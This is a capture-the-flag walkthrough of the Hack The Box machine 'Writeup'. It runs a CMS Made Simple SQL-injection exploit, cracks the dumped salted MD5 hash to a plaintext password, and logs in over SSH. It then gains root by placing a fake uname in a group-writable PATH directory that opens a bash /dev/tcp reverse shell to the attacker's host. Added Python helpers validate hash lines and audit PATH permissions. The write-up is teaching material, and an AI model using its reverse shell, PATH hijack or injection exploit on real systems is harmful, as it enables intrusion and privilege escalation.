Writeup
Ports scan
u505@kali:~/HTB/Machines/Writeup$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.138 --rate=1000
[sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-25 13:03:47 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.138
Discovered open port 22/tcp on 10.10.10.138
u505@kali:~/HTB/Machines/Writeup$ nmap -sC -sV 10.10.10.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:01 EST
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.29 seconds
Web
The site is a geek-style page, but it carries a warning that a DoS protection script bans IPs that trigger too many Apache 40x errors, so we cannot run web enumeration (directory brute-forcing) against it.
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb
<html lang="en_US">
<head><title>Nothing here yet.</title><style>.footer { background-color: #A0A0FF; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style></head>
<body bgcolor="#4040E0">
<center><pre>
<font color="#FF6666">
########################################################################
#                                                                      #
#        *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS ***              #
#                                                                      #
#  Not yet live and already under attack. I found an       ,~~--~~-.   #
#  Eeyore DoS protection script that is in place and      +  |  |\     #
#  watches for Apache 40x errors and bans bad IPs.       ||  |~ |`,/-\ #
#  Hope you do not get hit by false-positive drops!      *\_) \_) `-'  #
#                                                                      #
#  If you know where to download the proper Donkey DoS protection      #
#  please let me know via mail to jkr@writeup.htb - thanks!            #
#                                                                      #
########################################################################
</font>
<b>
<font color="#A0A0FF">
[ASCII-art banner containing "HTB NOTES"; its line layout did not survive extraction]
(c) by Normand Veilleux
<br>
<br>
I am still searching through my backups so there is nothing here yet.
I am preparing go-live of my own www.hackthebox.eu write-up page soon. Stay tuned!
<br>
<br>
<br>
<br>
<br>
<br>
</pre></center></b>
<div class="footer"><p><pre>Page is hand-crafted with vi.</pre></p></div>
</body>
</html>
Robots.txt
The robots file gives us a clue about a URL to visit (Nmap found it too).
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/robots.txt
#              __
#      _(\    |@@|
#     (__/\__ \--/ __
#        \___|----|  |   __
#            \ }{ /\ )_ / _\
#            /\__/\ \__O (__
#           (--/\--)    \__/
#           _)(  )(_
#          `------`
#
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
/writeup/
u505@kali:~/HTB/Machines/Writeup$ curl http://writeup.htb/writeup/
<!doctype html>
<html lang="en_US"><head>
<title>Home - writeup</title>
<base href="http://writeup.htb/writeup/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- cms_stylesheet error: No stylesheets matched the criteria specified -->
<style>.footer { background-color: white; position: fixed; left: 0; bottom: 0; width: 100%; color: black; text-align: center; }</style>
</head><body>
<header id="header">
<h1>writeup</h1>
</header>
<nav id="menu">
<ul><li class="currentpage"><a class="currentpage" href="http://writeup.htb/writeup/">Home Page</a></li><li><a href="http://writeup.htb/writeup/index.php?page=ypuffy">ypuffy</a></li><li><a href="http://writeup.htb/writeup/index.php?page=blue">blue</a></li><li><a href="http://writeup.htb/writeup/index.php?page=writeup">writeup</a></li></ul>
</nav>
<section id="content">
<h1>Home</h1>
<p>After many month of lurking around on HTB I also decided to start writing about the boxes I hacked. In the upcoming days, weeks and month you will find more and more content here as I am about to convert my famous incomplete notes into pretty write-ups.</p>
<p>I am still searching for someone to provide or make a cool theme. If you are interested, please contact me on <a href="https://mm.netsecfocus.com/">NetSec Focus Mattermost</a>. Thanks.</p>
</section>
<div class="footer">
<p>Pages are hand-crafted with vim. NOT.</p>
</div>
</body>
</html>
The Generator meta tag identifies CMS Made Simple, with a copyright notice running to 2019. The machine was released in June 2019, so the version can only be 2.2.9, 2.2.9.1 or 2.2.10 (http://dev.cmsmadesimple.org/project/files/6).
u505@kali:~/HTB/Machines/Writeup$ searchsploit CMS Made Simple
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code E | exploits/php/remote/46627.rb
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion       | exploits/php/webapps/26217.html
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting       | exploits/php/webapps/26298.txt
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting    | exploits/php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection        | exploits/php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulne | exploits/php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities             | exploits/php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution                   | exploits/php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection          | exploits/php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upl | exploits/php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion                  | exploits/php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure                 | exploits/php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scr | exploits/php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities              | exploits/php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery              | exploits/php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | exploits/php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Reque | exploits/php/webapps/34068.html
CMS Made Simple 2.1.6 - Multiple Vulnerabilities              | exploits/php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution                 | exploits/php/webapps/44192.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | exploits/php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | exploits/php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoni | exploits/php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection                      | exploits/php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upl | exploits/php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary Fil | exploits/php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbi | exploits/php/webapps/46546.py
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

u505@kali:~/HTB/Machines/Writeup$ searchsploit -m 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Writeup/46635.py
This exploit is a time-based blind SQL injection. It recovers the admin username, email, salt and password hash.
u505@kali:~/HTB/Machines/Writeup$ python 46635.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
We create the hash file for hashcat, in hash:salt layout.
u505@kali:~/HTB/Machines/Writeup$ cat hash.txt
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
And we brute-force it with hashcat.
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Writeup$ hashcat --force -m 20 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
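The hash.txt layout above is hash:salt, which is what hashcat mode 20 (md5($salt.$pass), salt prepended) expects; mode 10 is the opposite order, and picking the wrong one silently fails every candidate. The Python below is an added example for this write-up, not code from the original post or from CMS Made Simple: it parses that line format, rejects malformed lines before any cracking time is spent, and checks whether a single candidate password reproduces the stored digest, which is a quick sanity check both when choosing the mode and after hashcat reports a result. The sample line is the one dumped above; the wrong candidate in the demo is constructed.

```python
import hashlib

# Constructed sample: the hash:salt line dumped from the box in the write-up above.
SAMPLE_LINE = "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807"

HEX = set("0123456789abcdef")


def parse_hash_line(line):
    """Split a 'hash:salt' line (the hashcat -m 20 input layout) into (digest, salt).

    Raises ValueError when the line is not exactly two fields or the first field
    is not a 32-character hex MD5 digest, so a malformed dump is caught early."""
    parts = line.strip().split(":")
    if len(parts) != 2:
        raise ValueError(f"expected 'hash:salt', got {line!r}")
    digest, salt = parts[0].lower(), parts[1]
    if len(digest) != 32 or not set(digest) <= HEX:
        raise ValueError("first field is not a 32-hex-character MD5 digest")
    return digest, salt


def is_valid_hash_line(line):
    """Boolean wrapper around parse_hash_line for filtering a whole dump."""
    try:
        parse_hash_line(line)
        return True
    except ValueError:
        return False


def md5_salt_pass(salt, password):
    """hashcat mode 20: md5($salt.$pass), i.e. the salt is prepended, not appended.

    Mode 10 is md5($pass.$salt); the two produce different digests for the same
    inputs, so the order is worth checking against a known value."""
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def candidate_matches(line, password):
    """True when `password` reproduces the digest stored in a hash:salt line."""
    digest, salt = parse_hash_line(line)
    return md5_salt_pass(salt, password) == digest


if __name__ == "__main__":
    # Verify the password hashcat reported against the dumped line.
    print(candidate_matches(SAMPLE_LINE, "raykayjay9"))
    # A constructed wrong candidate, to show the negative case.
    print(candidate_matches(SAMPLE_LINE, "not-the-password"))
```

Running it against the dumped line with the password hashcat printed confirms the mode before the credential is reused anywhere; the same check is what an incident responder would run to confirm a leaked hash really corresponds to a known weak password.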
User Flag
With the username and password, we can SSH into the server.
u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
The authenticity of host 'writeup.htb (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts.
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ cat user.txt
<USER_FLAG>
Local enumeration
We serve LinEnum.sh and pspy64 from our machine:

u505@kali:~/HTB/Machines/Writeup/www$ ls -ltr
total 3056
-rw-r--r-- 1 u505 u505   46631 Feb  9 21:32 LinEnum.sh
-rw-r--r-- 1 u505 u505 3078592 Feb  9 21:32 pspy64
u505@kali:~/HTB/Machines/Writeup/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target server:

jkr@writeup:~$ cd /tmp/
jkr@writeup:/tmp$ wget -q http://10.10.14.30/pspy64
jkr@writeup:/tmp$ wget -q http://10.10.14.30/LinEnum.sh
jkr@writeup:/tmp$ chmod +x pspy64 LinEnum.sh
LinEnum.sh doesn't give us any clue about how to escalate privileges. pspy, however, shows a cron job running as root:
2020/02/25 09:27:01 CMD: UID=0 PID=2502 | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0 PID=2503 | /usr/sbin/CRON
2020/02/25 09:27:01 CMD: UID=0 PID=2504 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
There is a cron job, but we cannot read the file /root/bin/cleanup.pl.
SSH login
When we start an SSH session, the following commands are executed, the first of them as root (UID=0):
2020/02/25 09:27:27 CMD: UID=0 PID=2506 | sshd: [accepted]
2020/02/25 09:27:27 CMD: UID=0 PID=2507 | sshd: [accepted]
2020/02/25 09:27:35 CMD: UID=0 PID=2508 | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=0 PID=2509 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/02/25 09:27:35 CMD: UID=0 PID=2510 | run-parts --lsbsysinit /etc/update-motd.d
2020/02/25 09:27:35 CMD: UID=0 PID=2511 | uname -rnsom
2020/02/25 09:27:35 CMD: UID=0 PID=2512 | sshd: jkr [priv]
2020/02/25 09:27:35 CMD: UID=1000 PID=2513 | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2514 | -bash
2020/02/25 09:27:35 CMD: UID=1000 PID=2515 | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2516 | -bash
2020/02/25 09:27:36 CMD: UID=1000 PID=2517 | -bash
In the folder /etc/update-motd.d/ we find the file 10-uname, which calls uname by bare name, so it is resolved through the PATH shown above:
jkr@writeup:~$ ls -l /etc/update-motd.d/
total 4
-rwxr-xr-x 1 root root 23 Jun 3 2018 10-uname
jkr@writeup:~$ cat /etc/update-motd.d/10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:~$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
We cannot modify the file 10-uname (it is owned by root and writable only by root).
jkr@writeup:~$ whereis uname
uname: /bin/uname /usr/share/man/man1/uname.1.gz
The real uname command is located in /bin/. Our user is in the staff group:
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
These are the directories in the PATH that pspy showed for the root-run run-parts command:
jkr@writeup:~$ ls -ld /usr/local/sbin/
drwx-wsr-x 2 root staff 12288 Apr 19  2019 /usr/local/sbin/
jkr@writeup:~$ ls -ld /usr/local/bin/
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin/
jkr@writeup:~$ ls -ld /usr/sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /usr/sbin/
jkr@writeup:~$ ls -ld /usr/bin/
drwxr-xr-x 2 root root 20480 Aug 23  2019 /usr/bin/
jkr@writeup:~$ ls -ld /sbin/
drwxr-xr-x 2 root root 4096 Aug 23  2019 /sbin/
jkr@writeup:~$ ls -ld /bin/
drwxr-xr-x 2 root root 4096 Apr 19  2019 /bin/
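The two directories that come first in that PATH are setgid and group-writable by staff (drwx-wsr-x root staff), while a root-owned MOTD hook looks up uname by bare name. That combination is the whole finding, and it is checkable mechanically. The Python below is an added example written for this write-up, not part of the original post or of pspy, LinEnum or the box itself: it pulls the PATH out of the UID=0 pspy lines (the sample lines are the ones captured above) and checks each directory for the conditions that make a search path untrustworthy for a privileged process (missing, world-writable, or group-writable by a group other than root's). build_demo_layout() creates a throwaway directory tree mimicking the box's permissions so the audit can run offline; the default trusted_gids set (gid 0 only) is an assumption of this example.

```python
import os
import re
import stat
import tempfile

# Constructed sample: three pspy lines copied from the capture above. The first
# is the root-run MOTD hook with the PATH it hands to run-parts.
SAMPLE_PSPY = """\
2020/02/25 09:27:35 CMD: UID=0 PID=2509 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2020/02/25 09:27:35 CMD: UID=0 PID=2511 | uname -rnsom
2020/02/25 09:27:35 CMD: UID=1000 PID=2513 | -bash
"""

PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+) PID=(?P<pid>\d+) \| (?P<cmd>.*)$")
PATH_RE = re.compile(r"\bPATH=(?P<path>\S+)")


def root_paths_from_pspy(text):
    """Return every PATH= value that appears in a command pspy attributes to UID 0.

    These are the search paths a privileged process resolves bare command names
    through, so they are the ones worth auditing."""
    found = []
    for line in text.splitlines():
        m = PSPY_RE.search(line)
        if not m or m.group("uid") != "0":
            continue
        p = PATH_RE.search(m.group("cmd"))
        if p:
            found.append(p.group("path"))
    return found


def audit_path(path_str, trusted_gids=frozenset({0})):
    """Flag PATH entries a privileged process should not trust.

    Returns a list of (directory, reason). An entry is flagged when it is empty
    (resolves to the current directory), does not exist (whoever can create it
    controls lookups), is world-writable, or is group-writable by a group not in
    trusted_gids. Assumption: only root's group (gid 0) is trusted by default;
    on the box, staff (gid 50) has group write on /usr/local/sbin and /usr/local/bin."""
    findings = []
    for d in path_str.split(":"):
        if d == "":
            findings.append((d, "empty entry means current directory"))
            continue
        try:
            st = os.stat(d)  # follows symlinks, so the real directory is checked
        except FileNotFoundError:
            findings.append((d, "does not exist"))
            continue
        if st.st_mode & stat.S_IWOTH:
            findings.append((d, "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
            findings.append((d, f"group-writable (gid {st.st_gid})"))
    return findings


def build_demo_layout():
    """Create a throwaway tree that mimics the box's PATH permissions so the audit
    can be exercised offline: a root-style 0755 directory, a 2775 setgid
    group-writable one like /usr/local/bin on the box, and a missing entry."""
    base = tempfile.mkdtemp(prefix="path-audit-")
    safe = os.path.join(base, "safe")
    bad = os.path.join(base, "bad")
    os.mkdir(safe)
    os.chmod(safe, 0o755)
    os.mkdir(bad)
    os.chmod(bad, 0o2775)
    return safe, bad, os.path.join(base, "missing")


if __name__ == "__main__":
    # On the target, audit the PATH pspy saw a root process use.
    for path in root_paths_from_pspy(SAMPLE_PSPY):
        for directory, reason in audit_path(path):
            print(f"{directory}: {reason}")
    # Offline demo with the constructed layout; trusted_gids is emptied because
    # the demo directories belong to whichever group runs this script.
    safe, bad, missing = build_demo_layout()
    for directory, reason in audit_path(":".join([safe, bad, missing]), trusted_gids=frozenset()):
        print(f"{directory}: {reason}")
```

Run on the box, audit_path on the pspy PATH flags /usr/local/sbin and /usr/local/bin as group-writable by gid 50. The fix is on the directory side (remove group write, or remove non-admin users from staff) and on the script side (call binaries from MOTD hooks, cron jobs and sudo rules by absolute path); the same audit applies to any PATH a root process inherits.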
Because /usr/local/sbin and /usr/local/bin are group-writable by staff and come before /bin in that PATH, the strategy is to create a new uname command there that opens a reverse shell as root.
Escalation of Privileges
jkr@writeup:/tmp$ cat uname
#!/bin/bash
VAR=$*
/bin/bash -i >& /dev/tcp/10.10.14.30/4444 0>&1 &
/bin/uname $VAR
We start the listener:
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
If we execute our new uname script, it returns the real uname output, but at the same time opens a reverse shell.
jkr@writeup:/tmp$ ./uname -a
Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40656.
Now, if we copy our "uname" version into /usr/local/bin/, which precedes /bin in the PATH, our uname command will be executed instead of the real one.
jkr@writeup:/tmp$ cp uname /usr/local/bin/
When we log in from another console, the MOTD hook runs our uname as root, which opens the reverse shell.
u505@kali:~/HTB/Machines/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
...
Our reverse shell is opened.
u505@kali:~/HTB/Machines/Writeup$ nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.138.
Ncat: Connection from 10.10.10.138:40658.
bash: cannot set terminal process group (3145): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# whoami
whoami
root
Root flag
root@writeup:/# cat /root/root.txt
cat /root/root.txt
<ROOT Flag>
References
Daniel Simao 08:00, 25 February 2020 (EST)